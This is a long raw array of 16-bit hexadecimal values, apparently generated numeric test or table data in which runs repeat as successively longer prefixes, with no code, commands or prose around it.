0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x1bc8, 0xaca5, 0xa8a3, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x2453, 0xaafb, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x2453, 0xaafb, 0xa693, 0xb210, 0xaf7f, 0xb0d6, 0x2c1a, 0x9def, 0x33ed, 0x2d8c, 0xaa09, 0x2c15, 0xb408, 0x2179, 0xb076, 0x3202, 0xb2e3, 0xad11, 0x2446, 0xac75, 0x9c77, 0x347a, 0x2f4d, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x2453, 0xaafb, 0xa693, 0xb210, 0xaf7f, 0xb0d6, 0x2c1a, 0x9def, 0x33ed, 0x2d8c, 0xaa09, 0x2c15, 0xb408, 0x2179, 0xb076, 0x3202, 0xb2e3, 0xad11, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x2453, 0xaafb, 0xa693, 0xb210, 0xaf7f, 0xb0d6, 0x2c1a, 0x9def, 0x33ed, 0x2d8c, 0xaa09, 0x2c15, 0xb408, 0x2179, 0xb076, 0x3202, 0xb2e3, 0xad11, 0x2446, 0xac75, 0x9c77, 0x347a, 0x2f4d, 0x256d, 0x2eb1, 0x30c7, 0x300d, 0x2e0d, 0x3055, 0xaaeb, 0xa404, 0xac5c, 0xad9b, 0xa01f, 0x2cb5, 0x2c4f, 0x2cfd, 0xa9b8, 0x30ad, 0xa47d, 0xaf95, 0x2e40, 0xb30b, 0x2e25, 0xb091, 0xae9d, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x2453, 0xaafb, 0xa693, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x2453, 0xaafb, 0xa693, 0xb210, 0xaf7f, 0xb0d6, 0x2c1a, 0x9def, 0x33ed, 0x2d8c, 0xaa09, 0x2c15, 0xb408, 0x2179, 0xb076, 0x3202, 0xb2e3, 0xad11, 0x2446, 0xac75, 0x9c77, 0x347a, 0x2f4d, 0x256d, 0x2eb1, 0x30c7, 0x300d, 0x2e0d, 0x3055, 0xaaeb, 0xa404, 0xac5c, 0xad9b, 0xa01f, 0x2cb5, 0x2c4f, 0x2cfd, 0xa9b8, 0x30ad, 0xa47d, 0xaf95, 0x2e40, 0xb30b, 0x2e25, 0xb091, 0xae9d, 0x30a4, 0x9e62, 0x2e6e, 0x2e4d, 0xa4fc, 0x3239, 0x2d5b, 0xa73a, 0x323d, 0xb077, 0xab9d, 0xa847, 0xb444, 0xb2eb, 0xb1ae, 0xacf9, 0xb327, 0x2dba, 0x33ac, 0xb017, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x2453, 0xaafb, 0xa693, 0xb210, 0xaf7f, 0xb0d6, 0x2c1a, 0x9def, 0x33ed, 0x2d8c, 0xaa09, 0x2c15, 0xb408, 0x2179, 0xb076, 0x3202, 0xb2e3, 0xad11, 0x2446, 0xac75, 0x9c77, 0x347a, 0x2f4d, 0x256d, 0x2eb1, 0x30c7, 0x300d, 0x2e0d, 0x3055, 0xaaeb, 0xa404, 0xac5c, 0xad9b, 0xa01f, 0x2cb5, 0x2c4f, 0x2cfd, 0xa9b8, 0x30ad, 0xa47d, 0xaf95, 0x2e40, 0xb30b, 0x2e25, 0xb091, 0xae9d, 0x30a4, 0x9e62, 0x2e6e, 0x2e4d, 0xa4fc, 0x3239, 0x2d5b, 0xa73a, 0x323d, 0xb077, 0xab9d, 0xa847, 0xb444, 0xb2eb, 0xb1ae, 0xacf9, 0xb327, 0x2dba, 0x33ac, 0xb017, 0x2e7d, 0xa886, 0xb0f6, 0x1ed7, 0xad3f, 0x2c16, 0x2902, 0x302d, 0xb35c, 0xb13f, 0x2ec8, 0xac6d, 0x1a5a, 0x34d7, 0xb3b9, 0x2990, 0x3092, 0xb2e7, 0x2b72, 0xa88b, 0xaba9, 0xadeb, 0x8b5e, 0x9fb0, 0x9f44, 0xa630, 0xafa7, 0x33e3, 0x2fb2, 0xafe1, 0xb4af, 0xb0d1, 0x3135, 0xb1c2, 0xa5c9, 0xb0b3, 0x205a, 0xa900, 0xb3ea, 0xa9d0, 0xaa6b, 0xb15e, 0xa95a, 0x3611, 0xabf5, 0x2dbb, 0xafaa, 0x20f2, 0x33c1, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x2453, 0xaafb, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x2453, 0xaafb, 0xa693, 0xb210, 0xaf7f, 0xb0d6, 0x2c1a, 0x9def, 0x33ed, 0x2d8c, 0xaa09, 0x2c15, 0xb408, 0x2179, 0xb076, 0x3202, 0xb2e3, 0xad11, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x2453, 0xaafb, 0xa693, 0xb210, 0xaf7f, 0xb0d6, 0x2c1a, 0x9def, 0x33ed, 0x2d8c, 0xaa09, 0x2c15, 0xb408, 0x2179, 0xb076, 0x3202, 0xb2e3, 0xad11, 0x2446, 0xac75, 0x9c77, 0x347a, 0x2f4d, 0x256d, 0x2eb1, 0x30c7, 0x300d, 0x2e0d, 0x3055, 0xaaeb, 0xa404, 0xac5c, 0xad9b, 0xa01f, 0x2cb5, 0x2c4f, 0x2cfd, 0xa9b8, 0x30ad, 0xa47d, 0xaf95, 0x2e40, 0xb30b, 0x2e25, 0xb091, 0xae9d, 0x30a4, 0x9e62, 0x2e6e, 0x2e4d, 0xa4fc, 0x3239, 0x2d5b, 0xa73a, 0x323d, 0xb077, 0xab9d, 0xa847, 0xb444, 0xb2eb, 0xb1ae, 0xacf9, 0xb327, 0x2dba, 0x33ac, 0xb017, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x2453, 0xaafb, 0xa693, 0xb210, 0xaf7f, 0xb0d6, 0x2c1a, 0x9def, 0x33ed, 0x2d8c, 0xaa09, 0x2c15, 0xb408, 0x2179, 0xb076, 0x3202, 0xb2e3, 0xad11, 0x2446, 0xac75, 0x9c77, 0x347a, 0x2f4d, 0x256d, 0x2eb1, 0x30c7, 0x300d, 0x2e0d, 0x3055, 0xaaeb, 0xa404, 0xac5c, 0xad9b, 0xa01f, 0x2cb5, 0x2c4f, 0x2cfd, 0xa9b8, 0x30ad, 0xa47d, 0xaf95, 0x2e40, 0xb30b, 0x2e25, 0xb091, 0xae9d, 0x30a4, 0x9e62, 0x2e6e, 0x2e4d, 0xa4fc, 0x3239, 0x2d5b, 0xa73a, 0x323d, 0xb077, 0xab9d, 0xa847, 0xb444, 0xb2eb, 0xb1ae, 0xacf9, 0xb327, 0x2dba, 0x33ac, 0xb017, 0x2e7d, 0xa886, 0xb0f6, 0x1ed7, 0xad3f, 0x2c16, 0x2902, 0x302d, 0xb35c, 0xb13f, 0x2ec8, 0xac6d, 0x1a5a, 0x34d7, 0xb3b9, 0x2990, 0x3092, 0xb2e7, 0x2b72, 0xa88b, 0xaba9, 0xadeb, 0x8b5e, 0x9fb0, 0x9f44, 0xa630, 0xafa7, 0x33e3, 0x2fb2, 0xafe1, 0xb4af, 0xb0d1, 0x3135, 0xb1c2, 0xa5c9, 0xb0b3, 0x205a, 0xa900, 0xb3ea, 0xa9d0, 0xaa6b, 0xb15e, 0xa95a, 0x3611, 0xabf5, 0x2dbb, 0xafaa, 0x20f2, 0x33c1, 0xa5ec, 0x2ed7, 0x2fa8, 0xa68b, 0xabf2, 0xb017, 0xa8dd, 0xb140, 0xaa84, 0xac22, 0xab0b, 0xafdc, 0xafbd, 0x2ffa, 0xa1e6, 0xaf9e, 0xac68, 0xb02f, 0x24eb, 0xab8b, 0xa82a, 0xb4ac, 0x3148, 0xb363, 0x31a9, 0x2cb1, 0x2d71, 0xb4aa, 0xa84c, 0x2c95, 0x28da, 0x23ed, 0xab3c, 0xb1d5, 0x3017, 0x343b, 0x2cc2, 0x293b, 0x1ea2, 0x2bb4, 0x20cf, 0xb0bc, 0xa6a9, 0x2cbb, 0xb2b7, 0x290e, 0xaa8c, 0xb1ef, 0x31dd, 0x3080, 0x17ad, 0x3411, 0x3747, 0x300d, 0xad37, 0x344c, 0x34cf, 0xb44c, 0x2b0b, 0x2773, 0xaa02, 0x2bad, 0x2a46, 0x2f4a, 0xa35b, 0x2f41, 0x27dd, 0x2237, 0xb34d, 0x2403, 0x2d55, 0xab0b, 0x9593, 0x22bf, 0xb26c, 0xb070, 0x3158, 0x1eef, 0x2fe7, 0x257f, 0x2808, 0xb211, 0x15ef, 0xb045, 0xb271, 0x27c3, 0xb19a, 0xafe5, 0x217e, 0x2834, 0x2a34, 0xb068, 0x2aca, 0x311f, 0xb062, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x2453, 0xaafb, 0xa693, 0xb210, 0xaf7f, 0xb0d6, 0x2c1a, 0x9def, 0x33ed, 0x2d8c, 0xaa09, 0x2c15, 0xb408, 0x2179, 0xb076, 0x3202, 0xb2e3, 0xad11, 0x2446, 0xac75, 0x9c77, 0x347a, 0x2f4d, 0x256d, 0x2eb1, 0x30c7, 0x300d, 0x2e0d, 0x3055, 0xaaeb, 0xa404, 0xac5c, 0xad9b, 0xa01f, 0x2cb5, 0x2c4f, 0x2cfd, 0xa9b8, 0x30ad, 0xa47d, 0xaf95, 0x2e40, 0xb30b, 0x2e25, 0xb091, 0xae9d, 0x30a4, 0x9e62, 0x2e6e, 0x2e4d, 0xa4fc, 0x3239, 0x2d5b, 0xa73a, 0x323d, 0xb077, 0xab9d, 0xa847, 0xb444, 0xb2eb, 0xb1ae, 0xacf9, 0xb327, 0x2dba, 0x33ac, 0xb017, 0x2e7d, 0xa886, 0xb0f6, 0x1ed7, 0xad3f, 0x2c16, 0x2902, 0x302d, 0xb35c, 0xb13f, 0x2ec8, 0xac6d, 0x1a5a, 0x34d7, 0xb3b9, 0x2990, 0x3092, 0xb2e7, 0x2b72, 0xa88b, 0xaba9, 0xadeb, 0x8b5e, 0x9fb0, 0x9f44, 0xa630, 0xafa7, 0x33e3, 0x2fb2, 0xafe1, 0xb4af, 0xb0d1, 0x3135, 0xb1c2, 0xa5c9, 0xb0b3, 0x205a, 0xa900, 0xb3ea, 0xa9d0, 0xaa6b, 0xb15e, 0xa95a, 0x3611, 0xabf5, 0x2dbb, 0xafaa, 0x20f2, 0x33c1, 0xa5ec, 0x2ed7, 0x2fa8, 0xa68b, 0xabf2, 0xb017, 0xa8dd, 0xb140, 0xaa84, 0xac22, 0xab0b, 0xafdc, 0xafbd, 0x2ffa, 0xa1e6, 0xaf9e, 0xac68, 0xb02f, 0x24eb, 0xab8b, 0xa82a, 0xb4ac, 0x3148, 0xb363, 0x31a9, 0x2cb1, 0x2d71, 0xb4aa, 0xa84c, 0x2c95, 0x28da, 0x23ed, 0xab3c, 0xb1d5, 0x3017, 0x343b, 0x2cc2, 0x293b, 0x1ea2, 0x2bb4, 0x20cf, 0xb0bc, 0xa6a9, 0x2cbb, 0xb2b7, 0x290e, 0xaa8c, 0xb1ef, 0x31dd, 0x3080, 0x17ad, 0x3411, 0x3747, 0x300d, 0xad37, 0x344c, 0x34cf, 0xb44c, 0x2b0b, 0x2773, 0xaa02, 0x2bad, 0x2a46, 0x2f4a, 0xa35b, 0x2f41, 0x27dd, 0x2237, 0xb34d, 0x2403, 0x2d55, 0xab0b, 0x9593, 0x22bf, 0xb26c, 0xb070, 0x3158, 0x1eef, 0x2fe7, 0x257f, 0x2808, 0xb211, 0x15ef, 0xb045, 0xb271, 0x27c3, 0xb19a, 0xafe5, 0x217e, 0x2834, 0x2a34, 0xb068, 0x2aca, 0x311f, 0xb062, 0xa687, 0x2c3d, 0x31af, 0x9d90, 0x2fce, 0x34ad, 0x24cd, 0x20fc, 0x30ed, 0xb0bf, 0x2a26, 0xabcc, 0xb08a, 0x30d2, 0x297c, 0xadbd, 0xb005, 0x2d01, 0x9af1, 0x300b, 0xa6bc, 0xaf94, 0xaf6b, 0xac83, 0xb0a7, 0x2391, 0x3278, 0x35a7, 0x3076, 0x2d2f, 0x28a9, 0x31e5, 0xa813, 0xb073, 0x3066, 0x2f29, 0xae24, 0xb4d7, 0xae20, 0xa7c5, 0x3196, 0x2d4e, 0x2d73, 0xa83e, 0xb41d, 0xada0, 0x2ec9, 0xb09d, 0xa821, 0xa6d1, 0x324b, 0x2c6e, 0x269c, 0xaaae, 0xaf3c, 0xaeae, 0x3030, 0x351d, 0xb1ff, 0xb0e2, 0xaa83, 0xb365, 0x33c9, 0x2a83, 0xa151, 0x2731, 0xb534, 0x2c1c, 0xa94f, 0x2a09, 0xb30b, 0x3381, 0x3413, 0xa74e, 0x2a0a, 0xacbd, 0xa974, 0x2f6b, 0xa72a, 0xb059, 0x33b4, 0x9a14, 0x2550, 0xada5, 0x8ca7, 0x2d58, 0x3033, 0x2cea, 0xa4b8, 0x2953, 0x306c, 0x2cbc, 0xb016, 0x2029, 0xb298, 0x2d57, 0x3078, 0xa9a3, 0xad0b, 0x1e9d, 0x3164, 0xb06f, 0xb043, 0x2a65, 0x260a, 0x310d, 0x2ea8, 0x1c33, 0xac20, 0x31b4, 0x2015, 0x2876, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x2453, 0xaafb, 0xa693, 0xb210, 0xaf7f, 0xb0d6, 0x2c1a, 0x9def, 0x33ed, 0x2d8c, 0xaa09, 0x2c15, 0xb408, 0x2179, 0xb076, 0x3202, 0xb2e3, 0xad11, 0x2446, 0xac75, 0x9c77, 0x347a, 0x2f4d, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x2453, 0xaafb, 0xa693, 0xb210, 0xaf7f, 0xb0d6, 0x2c1a, 0x9def, 0x33ed, 0x2d8c, 0xaa09, 0x2c15, 0xb408, 0x2179, 0xb076, 0x3202, 0xb2e3, 0xad11, 0x2446, 0xac75, 0x9c77, 0x347a, 0x2f4d, 0x256d, 0x2eb1, 0x30c7, 0x300d, 0x2e0d, 0x3055, 0xaaeb, 0xa404, 0xac5c, 0xad9b, 0xa01f, 0x2cb5, 0x2c4f, 0x2cfd, 0xa9b8, 0x30ad, 0xa47d, 0xaf95, 0x2e40, 0xb30b, 0x2e25, 0xb091, 0xae9d, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 0xb6f5, 0xac52, 0x2774, 0xae75, 0x355e, 0x31fd, 0xb2fb, 0xacfd, 0x227c, 0x2453, 0xaafb, 0xa693, 0xb210, 0xaf7f, 0xb0d6, 0x2c1a, 0x9def, 0x33ed, 0x2d8c, 0xaa09, 0x2c15, 0xb408, 0x2179, 0xb076, 0x3202, 0xb2e3, 0xad11, 0x2446, 0xac75, 0x9c77, 0x347a, 0x2f4d, 0x256d, 0x2eb1, 0x30c7, 0x300d, 0x2e0d, 0x3055, 0xaaeb, 0xa404, 0xac5c, 0xad9b, 0xa01f, 0x2cb5, 0x2c4f, 0x2cfd, 0xa9b8, 0x30ad, 0xa47d, 0xaf95, 0x2e40, 0xb30b, 0x2e25, 0xb091, 0xae9d, 0x30a4, 0x9e62, 0x2e6e, 0x2e4d, 0xa4fc, 0x3239, 0x2d5b, 0xa73a, 0x323d, 0xb077, 0xab9d, 0xa847, 0xb444, 0xb2eb, 0xb1ae, 0xacf9, 0xb327, 0x2dba, 0x33ac, 0xb017, 0x2e7d, 0xa886, 0xb0f6, 0x1ed7, 0xad3f, 0x2c16, 0x2902, 0x302d, 0xb35c, 0xb13f, 0x2ec8, 0xac6d, 0x1a5a, 0x34d7, 0xb3b9, 0x2990, 0x3092, 0xb2e7, 0x2b72, 0xa88b, 0xaba9, 0xadeb, 0x8b5e, 0x9fb0, 0x9f44, 0xa630, 0xafa7, 0x33e3, 0x2fb2, 0xafe1, 0xb4af, 0xb0d1, 0x3135, 0xb1c2, 0xa5c9, 0xb0b3, 0x205a, 0xa900, 0xb3ea, 0xa9d0, 0xaa6b, 0xb15e, 0xa95a, 0x3611, 0xabf5, 0x2dbb, 0xafaa, 0x20f2, 0x33c1, 0x1bc8, 0xaca5, 0xa8a3, 0xac43, 0x2c1e, 0x3431, 0x2bfc, 0xb3d2, 0xb01e, 0xb436, 0xa313, 0x3105, 0x2e39, 0x2ca9, 0xb21d, 0xb16d, 0xb3f3, 0x291d, 0x3190, 0x2b3e, 0x16d2, 0xad13, 0x3288, 0xa8fd, 0xae5b, 0xad24, 0x3112, 0x2490, 0xa9d0, 0x2e8c, 0xad6c, 0xacf6, 0xb06a, 0xaa1e, 0x34b2, 0xab43, 0x2d42, 